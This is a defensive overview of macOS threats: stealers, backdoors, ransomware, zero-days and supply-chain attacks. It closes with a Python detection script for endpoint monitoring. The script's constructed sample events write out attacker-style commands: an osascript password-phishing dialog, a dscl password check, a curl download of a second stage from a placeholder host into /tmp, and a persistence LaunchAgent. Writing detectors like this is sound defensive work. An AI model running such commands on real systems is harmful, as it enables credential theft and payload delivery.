Mac Specific Threats and Analysis
Despite macOS’s strong security reputation, the platform is increasingly targeted by sophisticated and diverse threats. The adaptation of malware to newer Apple hardware security features, such as the M1 and M2 chips, signals a growing and serious risk. The macOS threat landscape is characterised by the industrialisation of malware through Malware-as-a-Service (MaaS) offerings and the use of cross-platform frameworks like Go and Rust.
Information Stealers (Infostealers)
Infostealers remain the most widespread threat to macOS. Their primary goal is to harvest sensitive data, and recent evolutions leverage advanced social engineering and the abuse of common user behaviours to bypass built-in security like Gatekeeper.
Technical Analysis and Notable Examples
| Threat Family | Technical Details | Distribution/Infection Vector |
|---|---|---|
| Atomic Stealer (AMOS) Family | Prolific in 2024, with variants like Poseidon (aka Rodrigo) and Cuckoo. They exploit AppleScript (osascript) by using hidden answer parameters to trick users into revealing their macOS password, which then unlocks the Keychain for credential theft. Newer variants use encrypted strings and remotely loaded AppleScript for evasion. | Heavily relies on malvertising (Google/Bing ads) and malicious GitHub repositories, often leading users to execute malicious one-line Terminal commands that bypass Gatekeeper. |
| Banshee | Observed in 2024/2025, capable of bypassing Apple’s XProtect. It validates user passwords using the dscl /Local/Default -authonly command and employs anti-analysis checks (e.g., avoiding Russian-language systems). Targets Keychain, browsers, and wallets. | Deployed through MaaS, often disguised as legitimate apps like Obsidian. |
| PyStealer | Python-based infostealer (observed 2024). Conducts extensive anti-VM checks and uses AppleScript for password prompts. Exfiltrates data via Discord Webhooks and remote servers. | Distributed via disk images disguised as PDF documents. |
| Cthulhu Stealer | Go-based MaaS infostealer (observed 2024). Steals credentials, cryptocurrency, and game accounts. Requires users to override Gatekeeper warnings. | Spread through fake applications (e.g., CleanMyMac, Adobe GenP). |
| CloudChat Infostealer | Go-based stealer (observed 2024). Performs geolocation checks to avoid Chinese systems. Features clipboard monitoring to swap crypto keys and data exfiltration via FTP and Telegram bots. | Distributed via a fake video meeting app (CloudChat). |
| FrigidStealer | Focuses on stealing browser credentials and session cookies. | Typically spread through fake software downloads. |
Backdoors and Trojans
Backdoors and Trojans provide attackers with persistent, covert access or deceive users into installing malware, creating a foothold for more extensive compromise. The trend of writing backdoors in cross-platform languages (Rust/Go) simplifies multi-platform targeting.
Technical Analysis and Notable Examples
| Threat Category | Threat Family/Name | Technical Details | Infection Vector |
|---|---|---|---|
| Backdoors | RustDoor (aka ThiefBucket) | A sophisticated backdoor written in Rust, which simplifies cross-platform development. Linked to ransomware groups (2024). | Delivered via trojanized applications. |
| Backdoors | SpectralBlur | Backdoor linked to a North Korean APT (Advanced Persistent Threat) group. Offers upload, download, and execution functionality for surveillance. | Delivered via trojanized applications or downloaders. |
| Backdoors | HZ RAT | Grants attackers full remote control (Remote Access Trojan) over infected systems. | Commonly delivered as a payload from a downloader. |
| Backdoors | ZuRu | A new variant was found hiding inside a trojanized version of the legitimate app Termius. Bypasses Gatekeeper by exploiting user trust and requiring a manual security override. | Trojanized application. |
| Trojans | Shlayer Trojan | A widely distributed Trojan. Its function is to download and execute other malicious payloads. | Distributed via fake software updates or malicious websites. |
| Trojans | XcodeSpy | A Trojan that embeds in tampered Xcode projects, specifically targeting software developers. It creates a persistent backdoor. | A malicious Xcode project shared among developers. |
| Trojans | RustBucket | A sophisticated backdoor trojan (2023) that bypassed Gatekeeper using a fake PDF app. Allowed for additional malware installation and spying. | Disguised as a fake PDF application. |
Ransomware
While historically less common, ransomware is evolving for macOS; modern variants attempt to exploit vulnerabilities in, and bypass the security measures of, Apple Silicon chips, which poses a real risk to users.
Technical Analysis and Notable Examples
| Threat Family/Name | Technical Details | Impact/Capability |
|---|---|---|
| NotLockBit (2024) | A macOS adaptation of the Windows LockBit variant. It demonstrated proof-of-concept capabilities for both file encryption and data exfiltration. Capable of bypassing Gatekeeper and exploiting vulnerabilities of M-series chips. | Encrypts files, demands ransom. Proof of concept on Apple Silicon. |
| EvilQuest (2020) | Combines file encryption with data theft. One of the more comprehensive early macOS ransomware threats. | Cripples operations, causes data breaches. |
| Albabat Ransomware (2025) | Evolved to target macOS in 2025, selectively encrypting files with specific extensions and leveraging legitimate tools to evade detection. | Targeted file encryption. |
| MacRansom (2017) | One of the first macOS ransomware families. | Demands Bitcoin payments for decryption. |
| KeRanger | Early notable macOS ransomware. | File encryption. |
Zero-Day Exploits and Supply Chain Attacks
These categories represent some of the most dangerous and evasive threats, often used in sophisticated, targeted campaigns.
Technical Analysis and Notable Examples
| Threat Category | Threat Family/Example | Technical Details | Impact |
|---|---|---|---|
| Zero-Day Exploits | CVE-2025-43300 | An out-of-bounds write vulnerability in Apple’s ImageIO framework. | Provides attackers with undetected access for extended periods, often triggered through maliciously crafted files (e.g., compromised images). |
| Supply Chain Attacks | EvasivePanda | A downloader campaign that infects users through compromised software or distribution channels. | Affects large groups of victims simultaneously by inserting a malicious payload into trusted software. |
| Supply Chain Attacks | Shai-Hulud Worm | A supply chain attack targeting the npm ecosystem (2025). | Compromises applications that rely on the infected package. |
| | LightSpy | A cross-platform surveillance framework impacting macOS, iOS, Android, and Windows, often linked to Chinese APT groups. | Enables widespread surveillance and data exfiltration. |
Emerging and Advanced Threats
This category highlights new trends and vectors, including the role of AI and the use of native hardware features.
Technical Analysis and Notable Examples
| Threat Category | Threat Family/Example | Technical Details | Impact/Capabilities |
|---|---|---|---|
| AI-Driven Threats | N/A | AI automates the creation of polymorphic malware variants that can dynamically evade signature-based detection. It also powers highly convincing and effective phishing lures. | Increased success rates for social engineering and dynamic evasion of traditional security solutions. |
| M1/M2 Native Malware | Silver Sparrow (2021) | One of the first malware strains designed to run natively on Apple’s M1 chips. It used a fake Adobe Flash update and could execute remote commands. | Demonstrated the feasibility of native execution on Apple Silicon, initially infecting over 30,000 Macs. |
| Downloaders | CloudFake, RustyAttr, DPRK Downloader | These are first-stage loaders that are central to multi-layered campaigns. They establish an initial beachhead before downloading the final, more malicious payload (e.g., a backdoor or stealer). | Facilitate multi-stage attacks and make detection more challenging by separating the initial compromise from the final payload. |
Recommendations for Defense
The complexity of the current macOS threat landscape necessitates a mature, zero-trust security posture.
- System and Application Updates: Promptly applying patches is the single most effective way to mitigate risk, closing exploitable flaws like the one mentioned in CVE-2025-43300.
- Enhanced Endpoint Security (EDR): Deploy Endpoint Detection and Response (EDR) solutions with advanced behavioural analysis. These tools can detect suspicious activities such as:
  - `osascript` commands with hidden parameters (used by AMOS).
  - Unauthorised `dscl` commands for credential validation (used by Banshee/PyStealer).
  - Unexpected `curl` requests or binaries being executed from temporary directories (`/tmp/`).
- Proactive Threat Hunting: Security teams must actively look for Indicators of Compromise (IoCs), particularly suspicious `plist` files being written to `~/Library/LaunchAgents/` to establish persistence.
- User Training: User education is a critical defence layer. Employees should be trained to recognise and avoid:
  - Malvertising and fake download sites.
  - Suspicious dialogue boxes that prompt for system passwords.
  - Executing Terminal commands copied from untrusted websites.
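The behaviours listed under the EDR and threat-hunting recommendations (and in the infostealer table above: AppleScript prompts with a hidden answer, `dscl ... -authonly` password validation, execution from `/tmp/`, and LaunchAgent persistence) can be turned into simple detection rules. The following is an added example, not Emsisoft's code or any product's detection logic; it runs over a few constructed process-execution records and a constructed LaunchAgent plist, and every rule name, sample command line and path in it is made up for illustration.

```python
"""Toy detection rules for the macOS behaviours described above.

Constructed example. The process events below stand in for the kind of
telemetry an EDR agent or Endpoint Security client would supply; the plist
stands in for a file found under ~/Library/LaunchAgents/.
"""
from __future__ import annotations

import plistlib
import re
import shlex
from dataclasses import dataclass

TMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/")


@dataclass
class ProcEvent:
    parent: str    # parent process name (hypothetical field)
    user: str      # account the process ran as
    cmdline: str   # full command line as one string


def detect_process_event(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips (empty list = clean)."""
    hits: list[str] = []
    try:
        argv = shlex.split(ev.cmdline)
    except ValueError:        # unbalanced quotes: fall back to a naive split
        argv = ev.cmdline.split()
    if not argv:
        return hits
    exe = argv[0].rsplit("/", 1)[-1]
    joined = " ".join(argv)

    # AMOS-style password phishing: an AppleScript dialog whose answer is hidden
    if exe == "osascript" and re.search(r"with\s+hidden\s+answer", joined, re.I):
        hits.append("osascript_hidden_answer_prompt")
    # Banshee-style validation of a typed password against the local directory node
    if exe == "dscl" and "-authonly" in argv:
        hits.append("dscl_authonly_credential_check")
    # A binary launched straight out of a temporary directory
    if argv[0].startswith(TMP_PREFIXES):
        hits.append("exec_from_tmp")
    # curl writing a download into a temporary directory (second-stage fetch)
    if exe == "curl" and any(a.startswith(TMP_PREFIXES) for a in argv[1:]):
        hits.append("curl_to_tmp")
    return hits


def assess_launch_agent(plist_bytes: bytes) -> list[str]:
    """Flag a LaunchAgent plist whose job runs something a stealer or
    downloader would plant for persistence; returns the reasons it was flagged."""
    reasons: list[str] = []
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    if not args:
        return reasons
    exe = args[0].rsplit("/", 1)[-1]
    if any(a.startswith(TMP_PREFIXES) for a in args):
        reasons.append("path_in_tmp")
    if any("/." in a for a in args):          # dot-directory or dot-file in a path
        reasons.append("hidden_path")
    if exe in {"curl", "osascript", "sh", "bash", "zsh", "python3"}:
        reasons.append(f"interpreter_or_downloader:{exe}")
    if job.get("RunAtLoad") and reasons:      # only meaningful alongside another reason
        reasons.append("run_at_load")
    return reasons


# Constructed sample telemetry; none of this is real captured data.
SAMPLE_EVENTS = [
    ProcEvent("Terminal", "alice",
              "/usr/bin/osascript -e 'display dialog \"macOS needs your password\" "
              "default answer \"\" with hidden answer'"),
    ProcEvent("Installer", "alice", "/usr/bin/dscl /Local/Default -authonly alice REDACTED"),
    ProcEvent("Terminal", "alice", "/usr/bin/curl -s https://example.invalid/stage2 -o /tmp/.x"),
    ProcEvent("launchd", "alice", "/tmp/.x --init"),
    ProcEvent("Finder", "alice", "/usr/bin/osascript -e 'tell application \"Finder\" to open home'"),
]

SAMPLE_PLIST = plistlib.dumps({   # constructed LaunchAgent with a hidden payload path
    "Label": "com.example.update",
    "ProgramArguments": ["/bin/sh", "-c", "/Users/alice/Library/.cache/.x"],
    "RunAtLoad": True,
})
BENIGN_PLIST = plistlib.dumps({   # constructed, ordinary-looking job
    "Label": "com.example.helper",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"],
    "RunAtLoad": True,
})


def triage(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Pair each event's command line with the rules it tripped."""
    return [(ev.cmdline, detect_process_event(ev)) for ev in events]


if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS):
        print(f"{hits or ['clean']}: {cmdline}")
    print("launch agent:", assess_launch_agent(SAMPLE_PLIST) or "clean")
    print("benign agent:", assess_launch_agent(BENIGN_PLIST) or "clean")
```

The rules are deliberately narrow: the `osascript` rule keys on the `with hidden answer` clause rather than on any dialog, and the `RunAtLoad` reason is only reported when another reason already fired, since plenty of legitimate agents run at login. In practice each rule would be tuned against a baseline of the fleet's normal activity before being promoted to an alert.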